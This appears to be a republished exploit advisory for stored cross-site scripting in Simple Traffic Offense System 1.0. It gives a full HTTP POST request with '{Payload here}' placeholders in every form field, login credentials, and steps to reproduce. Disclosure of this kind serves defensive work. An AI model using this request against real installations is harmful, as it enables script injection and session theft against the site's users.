Simple Traffic Offense System 1.0 Exploit, Stored Cross Site Scripting (XSS)

# Exploit Title: Simple Traffic Offense System 1.0 - 'Multiple' Stored Cross Site Scripting (XSS)
# Date: 30-06-2021
# Exploit Author: Barış Yıldızoğlu
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/trafic.zip
# Version: 1.0
# Tested on: Windows 10 Home 64 Bit + Wampserver Version 3.2.3

# Description: Almost all inputs contain Stored XSS on the website

Request:

POST /Trafic/save-reported.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
Firefox/78.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 168
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/Trafic/report-offence.php
Cookie: PHPSESSID=vbsq5n2m09etst1mfcmq84gifo
Upgrade-Insecure-Requests: 1

offence_id={Payload here}&vehicle_no={Payload here}&driver_license={Payload
here}&name={Payload here}&address={Payload here}&gender={Payload
here}&officer_reporting={Payload here}&offence={Payload here}


# Steps to Reproduce:
[1.] Login to the system [+] username=Torrahclef&pass=yemiyemi
[2.] Go to the Report Offense page
[3.] Send the request above with the Stored XSS payload
[4.] Dashboard and Offense list pages will be triggered

All rights reserved nPulse.net 2009 - 2021
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD